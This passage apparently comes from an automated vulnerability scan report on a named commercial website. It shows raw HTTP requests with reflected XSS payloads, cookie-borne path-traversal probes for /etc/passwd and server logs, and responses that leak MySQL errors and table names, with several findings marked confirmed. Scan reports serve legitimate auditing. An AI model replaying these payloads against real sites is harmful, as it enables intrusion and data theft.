OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=uduhhoga4dmaacq3nsuten69a5; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005E2)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/obtm00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E2)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8rh9pichdf7bfld1a60cn2eme0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='"--></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E2)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '"--></style></script><script>alert(0x0005E5)</script>

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rnf1crtqemb7egb23m8c3rlff1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='"--></style></script><script>netsparker(0x0005E5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005E3)</script>

Request

